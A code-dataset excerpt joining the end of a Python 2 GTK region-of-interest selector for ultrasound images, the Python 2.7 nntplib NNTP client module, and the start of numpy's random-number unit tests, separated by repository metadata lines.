self.csize = shape(img)
self.canvas.set_size_request(self.csize[1], self.csize[0])
self.canvas.set_scroll_region(0, 0, self.csize[1], self.csize[0])
self.cbox.add(self.canvas)
self.canvas.connect("event", self.canvas_event)
self.DRAG = False
self.pathtofiles = '/'.join(self.datafiles[0].split('/')[:-1]) + '/'
#Read ROI_config.txt if it exists
#self.config = os.path.join(self.pathtofiles, 'ROI_config.txt')
self.config = 'ROI_config.txt'
#if (os.path.isfile(self.config)):
if os.path.isfile(os.path.join(self.pathtofiles, self.config)):
c = open(self.config, 'r').readlines()
self.top = int(c[1][:-1].split('\t')[1])
self.bottom = int(c[2][:-1].split('\t')[1])
self.left = int(c[3][:-1].split('\t')[1])
self.right = int(c[4][:-1].split('\t')[1])
else:
self.top = 140 #default settings for the Sonosite Titan
self.bottom = 320
self.left = 250
self.right = 580
self.getSumImage()
pixbuf = gtk.gdk.pixbuf_new_from_file(self.pathtofiles+'SumImage.png')
self.background = self.canvas.root().add(gnomecanvas.CanvasPixbuf, x=0, y=0, pixbuf=pixbuf)
self.reset()
subprocess.Popen(['rm', self.pathtofiles+'SumImage.png'])
self.window.show_all()
def onOpen(self):
fc = gtk.FileChooserDialog(title='Open Image Files', parent=None,
action=gtk.FILE_CHOOSER_ACTION_OPEN,
buttons=(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_OPEN, gtk.RESPONSE_OK))
g_directory = fc.get_current_folder() if fc.get_current_folder() else os.path.expanduser("~")
fc.set_current_folder(g_directory)
fc.set_default_response(gtk.RESPONSE_OK)
fc.set_select_multiple(True)
ffilter = gtk.FileFilter()
ffilter.set_name('Image Files')
ffilter.add_pattern('*.jpg')
ffilter.add_pattern('*.png')
fc.add_filter(ffilter)
response = fc.run()
if response == gtk.RESPONSE_OK:
self.datafiles = fc.get_filenames()
g_directory = fc.get_current_folder() #set this to an attribute?
fc.destroy()
def onSave(self, event):
model = self.machineCBox.get_model()
index = self.machineCBox.get_active()
machine = model[index][0]
fc = gtk.FileChooserDialog(title='Save RoI Config File', parent=None,
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
fc.set_current_name(self.config) #sets a suggested filename
g_directory = fc.get_current_folder() if fc.get_current_folder() else os.path.expanduser("~")
fc.set_current_folder(g_directory)
fc.set_default_response(gtk.RESPONSE_OK)
fc.set_select_multiple(False)
fc.set_do_overwrite_confirmation(True)
response = fc.run()
#exit fc on cancel..
if response == gtk.RESPONSE_CANCEL:
fc.destroy()
#save...
if response == gtk.RESPONSE_OK:
savename = fc.get_filename()
f_path, f_name = os.path.split(savename)
o = open(savename, 'w')
o.write('machine\t%s\n' % machine)
o.write('top\t%s\n' % self.topentry.get_text())
o.write('bottom\t%s\n' % self.bottomentry.get_text())
o.write('left\t%s\n' % self.leftentry.get_text())
o.write('right\t%s\n' % self.rightentry.get_text())
o.close()
dialog = gtk.MessageDialog(parent=None, type=gtk.MESSAGE_INFO,
buttons=gtk.BUTTONS_CLOSE, message_format="{roi_config} saved to {path}".format(roi_config=f_name, path=f_path))
dialog.set_title("Save confirmation")
dialog.add_button("Exit Program", 100) #100 is an arbitrary choice...
response = dialog.run()
#if we want to exit the program...
if response == 100:
dialog.destroy()
fc.destroy()
gtk.main_quit()
#if we just want to exit fc...
else:
dialog.destroy()
fc.destroy()
def onReset(self, event):
self.reset()
def reset(self):
try:
self.rubberband.destroy()
except AttributeError:
pass
self.rubberband = self.get_rect(self.left, self.top)
self.rubberband.set(x2=self.right, y2=self.bottom)
self.topentry.set_text(str(self.top))
self.bottomentry.set_text(str(self.bottom))
self.leftentry.set_text(str(self.left))
self.rightentry.set_text(str(self.right))
def resetByText(self, event):
top = int(self.topentry.get_text())
bottom = int(self.bottomentry.get_text())
left = int(self.leftentry.get_text())
right = int(self.rightentry.get_text())
try:
self.rubberband.destroy()
except AttributeError:
pass
self.rubberband = self.get_rect(left, top)
self.rubberband.set(x2=right, y2=bottom)
def canvas_event(self, widget, event):
if (event.type == gtk.gdk.MOTION_NOTIFY):
context_id = self.statusbar.get_context_id("mouse motion")
text = "({x},{y})".format(x=int(event.x), y=int(event.y))
self.statusbar.push(context_id, text)
if (self.DRAG):
self.rubberband.set(x2=event.x, y2=event.y)
if (event.type == gtk.gdk.BUTTON_PRESS):
if (event.button == 1):
self.rubberband.destroy()
self.DRAG = True
self.startx = event.x
self.starty = event.y
self.rubberband = self.get_rect(self.startx, self.starty)
# sends selection data to the relevant method
if (event.type == gtk.gdk.BUTTON_RELEASE) and (self.DRAG):
if (event.button == 1):
self.DRAG = False
self.endx = event.x
self.endy = event.y
self.rubberband.set(x2=self.endx, y2=self.endy)
if (self.starty <= self.endy):
self.topentry.set_text(str(int(self.starty)))
self.bottomentry.set_text(str(int(self.endy)))
else:
self.topentry.set_text(str(int(self.endy)))
self.bottomentry.set_text(str(int(self.starty)))
if (self.startx <= self.endx):
self.leftentry.set_text(str(int(self.startx)))
self.rightentry.set_text(str(int(self.endx)))
else:
self.leftentry.set_text(str(int(self.endx)))
self.rightentry.set_text(str(int(self.startx)))
def get_rect(self, x, y):
itemType = gnomecanvas.CanvasRect
rect = self.canvas.root().add(itemType, x1=x, y1=y, x2=x, y2=y, #0x0 dimensions at first
fill_color_rgba=0xFFFF0000, outline_color_rgba=0xFFFF0055, width_units=1.0)
return rect
def getSumImage(self):
sum_img = zeros(self.csize)
for i in self.datafiles:
img = cv.LoadImageM(i, iscolor=False)
tmp = zeros(self.csize)
tmp += img
sum_img += tmp
#sum_img = (sum_img * 255)/(numpy.max(sum_img))
sum_img = sum_img/len(self.datafiles)
cv.SaveImage(self.pathtofiles+'SumImage.png', cv.fromarray(sum_img))
self.sum_img = sum_img
if __name__ == "__main__":
ImageWindow()
gtk.main()
| mit |
makermade/arm_android-19_arm-linux-androideabi-4.8 | lib/python2.7/nntplib.py | 157 | 21135 | """An NNTP client class based on RFC 977: Network News Transfer Protocol.
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print 'Group', name, 'has', count, 'articles, range', first, 'to', last
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', first + '-' + last)
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'r') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
# RFC 977 by Brian Kantor and Phil Lapsley.
# xover, xgtitle, xpath, date methods by Kevan Heydon
# Imports
import re
import socket
__all__ = ["NNTP","NNTPReplyError","NNTPTemporaryError",
"NNTPPermanentError","NNTPProtocolError","NNTPDataError",
"error_reply","error_temp","error_perm","error_proto",
"error_data",]
# Exceptions raised when an error or invalid response is received
class NNTPError(Exception):
"""Base class for all nntplib exceptions"""
def __init__(self, *args):
Exception.__init__(self, *args)
try:
self.response = args[0]
except IndexError:
self.response = 'No response given'
class NNTPReplyError(NNTPError):
"""Unexpected [123]xx reply"""
pass
class NNTPTemporaryError(NNTPError):
"""4xx errors"""
pass
class NNTPPermanentError(NNTPError):
"""5xx errors"""
pass
class NNTPProtocolError(NNTPError):
"""Response does not begin with [1-5]"""
pass
class NNTPDataError(NNTPError):
"""Error in response data"""
pass
# for backwards compatibility
error_reply = NNTPReplyError
error_temp = NNTPTemporaryError
error_perm = NNTPPermanentError
error_proto = NNTPProtocolError
error_data = NNTPDataError
# Standard port used by NNTP servers
NNTP_PORT = 119
# Response numbers that are followed by additional text (e.g. article)
LONGRESP = ['100', '215', '220', '221', '222', '224', '230', '231', '282']
# Line terminators (we always output CRLF, but accept any of CRLF, CR, LF)
CRLF = '\r\n'
# The class itself
class NNTP:
def __init__(self, host, port=NNTP_PORT, user=None, password=None,
readermode=None, usenetrc=True):
"""Initialize an instance. Arguments:
- host: hostname to connect to
- port: port to connect to (default the standard NNTP port)
- user: username to authenticate with
- password: password to use with username
- readermode: if true, send 'mode reader' command after
connecting.
readermode is sometimes necessary if you are connecting to an
NNTP server on the local machine and intend to call
reader-specific commands, such as `group'. If you get
unexpected NNTPPermanentErrors, you might need to set
readermode.
"""
self.host = host
self.port = port
self.sock = socket.create_connection((host, port))
self.file = self.sock.makefile('rb')
self.debugging = 0
self.welcome = self.getresp()
# 'mode reader' is sometimes necessary to enable 'reader' mode.
# However, the order in which 'mode reader' and 'authinfo' need to
# arrive differs between some NNTP servers. Try to send
# 'mode reader', and if it fails with an authorization failed
# error, try again after sending authinfo.
readermode_afterauth = 0
if readermode:
try:
self.welcome = self.shortcmd('mode reader')
except NNTPPermanentError:
# error 500, probably 'not implemented'
pass
except NNTPTemporaryError, e:
if user and e.response[:3] == '480':
# Need authorization before 'mode reader'
readermode_afterauth = 1
else:
raise
# If no login/password was specified, try to get them from ~/.netrc
# Presume that if .netc has an entry, NNRP authentication is required.
try:
if usenetrc and not user:
import netrc
credentials = netrc.netrc()
auth = credentials.authenticators(host)
if auth:
user = auth[0]
password = auth[2]
except IOError:
pass
# Perform NNRP authentication if needed.
if user:
resp = self.shortcmd('authinfo user '+user)
if resp[:3] == '381':
if not password:
raise NNTPReplyError(resp)
else:
resp = self.shortcmd(
'authinfo pass '+password)
if resp[:3] != '281':
raise NNTPPermanentError(resp)
if readermode_afterauth:
try:
self.welcome = self.shortcmd('mode reader')
except NNTPPermanentError:
# error 500, probably 'not implemented'
pass
# Get the welcome message from the server
# (this is read and squirreled away by __init__()).
# If the response code is 200, posting is allowed;
# if it 201, posting is not allowed
def getwelcome(self):
"""Get the welcome message from the server
(this is read and squirreled away by __init__()).
If the response code is 200, posting is allowed;
if it 201, posting is not allowed."""
if self.debugging: print '*welcome*', repr(self.welcome)
return self.welcome
def set_debuglevel(self, level):
"""Set the debugging level. Argument 'level' means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
2: also print raw lines read and sent before stripping CR/LF"""
self.debugging = level
debug = set_debuglevel
def putline(self, line):
"""Internal: send one line to the server, appending CRLF."""
line = line + CRLF
if self.debugging > 1: print '*put*', repr(line)
self.sock.sendall(line)
def putcmd(self, line):
"""Internal: send one command to the server (through putline())."""
if self.debugging: print '*cmd*', repr(line)
self.putline(line)
def getline(self):
"""Internal: return one line from the server, stripping CRLF.
Raise EOFError if the connection is closed."""
line = self.file.readline()
if self.debugging > 1:
print '*get*', repr(line)
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
def getresp(self):
"""Internal: get a response from the server.
Raise various errors if the response indicates an error."""
resp = self.getline()
if self.debugging: print '*resp*', repr(resp)
c = resp[:1]
if c == '4':
raise NNTPTemporaryError(resp)
if c == '5':
raise NNTPPermanentError(resp)
if c not in '123':
raise NNTPProtocolError(resp)
return resp
def getlongresp(self, file=None):
"""Internal: get a response plus following text from the server.
Raise various errors if the response indicates an error."""
openedFile = None
try:
# If a string was passed then open a file with that name
if isinstance(file, str):
openedFile = file = open(file, "w")
resp = self.getresp()
if resp[:3] not in LONGRESP:
raise NNTPReplyError(resp)
list = []
while 1:
line = self.getline()
if line == '.':
break
if line[:2] == '..':
line = line[1:]
if file:
file.write(line + "\n")
else:
list.append(line)
finally:
# If this method created the file, then it must close it
if openedFile:
openedFile.close()
return resp, list
def shortcmd(self, line):
"""Internal: send a command and get the response."""
self.putcmd(line)
return self.getresp()
def longcmd(self, line, file=None):
"""Internal: send a command and get the response plus following text."""
self.putcmd(line)
return self.getlongresp(file)
def newgroups(self, date, time, file=None):
"""Process a NEWGROUPS command. Arguments:
- date: string 'yymmdd' indicating the date
- time: string 'hhmmss' indicating the time
Return:
- resp: server response if successful
- list: list of newsgroup names"""
return self.longcmd('NEWGROUPS ' + date + ' ' + time, file)
def newnews(self, group, date, time, file=None):
"""Process a NEWNEWS command. Arguments:
- group: group name or '*'
- date: string 'yymmdd' indicating the date
- time: string 'hhmmss' indicating the time
Return:
- resp: server response if successful
- list: list of message ids"""
cmd = 'NEWNEWS ' + group + ' ' + date + ' ' + time
return self.longcmd(cmd, file)
def list(self, file=None):
"""Process a LIST command. Return:
- resp: server response if successful
- list: list of (group, last, first, flag) (strings)"""
resp, list = self.longcmd('LIST', file)
for i in range(len(list)):
# Parse lines into "group last first flag"
list[i] = tuple(list[i].split())
return resp, list
def description(self, group):
"""Get a description for a single group. If more than one
group matches ('group' is a pattern), return the first. If no
group matches, return an empty string.
This elides the response code from the server, since it can
only be '215' or '285' (for xgtitle) anyway. If the response
code is needed, use the 'descriptions' method.
NOTE: This neither checks for a wildcard in 'group' nor does
it check whether the group actually exists."""
resp, lines = self.descriptions(group)
if len(lines) == 0:
return ""
else:
return lines[0][1]
def descriptions(self, group_pattern):
"""Get descriptions for a range of groups."""
line_pat = re.compile("^(?P<group>[^ \t]+)[ \t]+(.*)$")
# Try the more std (acc. to RFC2980) LIST NEWSGROUPS first
resp, raw_lines = self.longcmd('LIST NEWSGROUPS ' + group_pattern)
if resp[:3] != "215":
# Now the deprecated XGTITLE. This either raises an error
# or succeeds with the same output structure as LIST
# NEWSGROUPS.
resp, raw_lines = self.longcmd('XGTITLE ' + group_pattern)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def group(self, name):
"""Process a GROUP command. Argument:
- group: the group name
Returns:
- resp: server response if successful
- count: number of articles (string)
- first: first article number (string)
- last: last article number (string)
- name: the group name"""
resp = self.shortcmd('GROUP ' + name)
if resp[:3] != '211':
raise NNTPReplyError(resp)
words = resp.split()
count = first = last = 0
n = len(words)
if n > 1:
count = words[1]
if n > 2:
first = words[2]
if n > 3:
last = words[3]
if n > 4:
name = words[4].lower()
return resp, count, first, last, name
def help(self, file=None):
"""Process a HELP command. Returns:
- resp: server response if successful
- list: list of strings"""
return self.longcmd('HELP',file)
def statparse(self, resp):
"""Internal: parse the response of a STAT, NEXT or LAST command."""
if resp[:2] != '22':
raise NNTPReplyError(resp)
words = resp.split()
nr = 0
id = ''
n = len(words)
if n > 1:
nr = words[1]
if n > 2:
id = words[2]
return resp, nr, id
def statcmd(self, line):
"""Internal: process a STAT, NEXT or LAST command."""
resp = self.shortcmd(line)
return self.statparse(resp)
def stat(self, id):
"""Process a STAT command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: the article number
- id: the message id"""
return self.statcmd('STAT ' + id)
def next(self):
"""Process a NEXT command. No arguments. Return as for STAT."""
return self.statcmd('NEXT')
def last(self):
"""Process a LAST command. No arguments. Return as for STAT."""
return self.statcmd('LAST')
def artcmd(self, line, file=None):
"""Internal: process a HEAD, BODY or ARTICLE command."""
resp, list = self.longcmd(line, file)
resp, nr, id = self.statparse(resp)
return resp, nr, id, list
def head(self, id):
"""Process a HEAD command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article's header"""
return self.artcmd('HEAD ' + id)
def body(self, id, file=None):
"""Process a BODY command. Argument:
- id: article number or message id
- file: Filename string or file object to store the article in
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article's body or an empty list
if file was used"""
return self.artcmd('BODY ' + id, file)
def article(self, id):
"""Process an ARTICLE command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article"""
return self.artcmd('ARTICLE ' + id)
def slave(self):
"""Process a SLAVE command. Returns:
- resp: server response if successful"""
return self.shortcmd('SLAVE')
def xhdr(self, hdr, str, file=None):
"""Process an XHDR command (optional server extension). Arguments:
- hdr: the header type (e.g. 'subject')
- str: an article nr, a message id, or a range nr1-nr2
Returns:
- resp: server response if successful
- list: list of (nr, value) strings"""
pat = re.compile('^([0-9]+) ?(.*)\n?')
resp, lines = self.longcmd('XHDR ' + hdr + ' ' + str, file)
for i in range(len(lines)):
line = lines[i]
m = pat.match(line)
if m:
lines[i] = m.group(1, 2)
return resp, lines
def xover(self, start, end, file=None):
"""Process an XOVER command (optional server extension) Arguments:
- start: start of range
- end: end of range
Returns:
- resp: server response if successful
- list: list of (art-nr, subject, poster, date,
id, references, size, lines)"""
resp, lines = self.longcmd('XOVER ' + start + '-' + end, file)
xover_lines = []
for line in lines:
elem = line.split("\t")
try:
xover_lines.append((elem[0],
elem[1],
elem[2],
elem[3],
elem[4],
elem[5].split(),
elem[6],
elem[7]))
except IndexError:
raise NNTPDataError(line)
return resp,xover_lines
def xgtitle(self, group, file=None):
"""Process an XGTITLE command (optional server extension) Arguments:
- group: group name wildcard (i.e. news.*)
Returns:
- resp: server response if successful
- list: list of (name,title) strings"""
line_pat = re.compile("^([^ \t]+)[ \t]+(.*)$")
resp, raw_lines = self.longcmd('XGTITLE ' + group, file)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def xpath(self,id):
"""Process an XPATH command (optional server extension) Arguments:
- id: Message id of article
Returns:
resp: server response if successful
path: directory path to article"""
resp = self.shortcmd("XPATH " + id)
if resp[:3] != '223':
raise NNTPReplyError(resp)
try:
[resp_num, path] = resp.split()
except ValueError:
raise NNTPReplyError(resp)
else:
return resp, path
def date (self):
"""Process the DATE command. Arguments:
None
Returns:
resp: server response if successful
date: Date suitable for newnews/newgroups commands etc.
time: Time suitable for newnews/newgroups commands etc."""
resp = self.shortcmd("DATE")
if resp[:3] != '111':
raise NNTPReplyError(resp)
elem = resp.split()
if len(elem) != 2:
raise NNTPDataError(resp)
date = elem[1][2:8]
time = elem[1][-6:]
if len(date) != 6 or len(time) != 6:
raise NNTPDataError(resp)
return resp, date, time
def post(self, f):
"""Process a POST command. Arguments:
- f: file containing the article
Returns:
- resp: server response if successful"""
resp = self.shortcmd('POST')
# Raises error_??? if posting is not allowed
if resp[0] != '3':
raise NNTPReplyError(resp)
while 1:
line = f.readline()
if not line:
break
if line[-1] == '\n':
line = line[:-1]
if line[:1] == '.':
line = '.' + line
self.putline(line)
self.putline('.')
return self.getresp()
def ihave(self, id, f):
"""Process an IHAVE command. Arguments:
- id: message-id of the article
- f: file containing the article
Returns:
- resp: server response if successful
Note that if the server refuses the article an exception is raised."""
resp = self.shortcmd('IHAVE ' + id)
# Raises error_??? if the server already has it
if resp[0] != '3':
raise NNTPReplyError(resp)
while 1:
line = f.readline()
if not line:
break
if line[-1] == '\n':
line = line[:-1]
if line[:1] == '.':
line = '.' + line
self.putline(line)
self.putline('.')
return self.getresp()
def quit(self):
"""Process a QUIT command and close the socket. Returns:
- resp: server response if successful"""
resp = self.shortcmd('QUIT')
self.file.close()
self.sock.close()
del self.file, self.sock
return resp
# Test retrieval when run as a script.
# Assumption: if there's a local news server, it's called 'news'.
# Assumption: if user queries a remote news server, it's named
# in the environment variable NNTPSERVER (used by slrn and kin)
# and we want readermode off.
if __name__ == '__main__':
import os
newshost = 'news' and os.environ["NNTPSERVER"]
if newshost.find('.') == -1:
mode = 'readermode'
else:
mode = None
s = NNTP(newshost, readermode=mode)
resp, count, first, last, name = s.group('comp.lang.python')
print resp
print 'Group', name, 'has', count, 'articles, range', first, 'to', last
resp, subs = s.xhdr('subject', first + '-' + last)
print resp
for item in subs:
print "%7s %s" % item
resp = s.quit()
print resp
| gpl-2.0 |
jonyroda97/redbot-amigosprovaveis | lib/numpy/random/tests/test_random.py | 12 | 64445 | from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy import random
import sys
import warnings
class TestSeed(TestCase):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(TestCase):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
np.float(1))
class TestSetState(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(TestCase):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianess
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed
def setUp(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
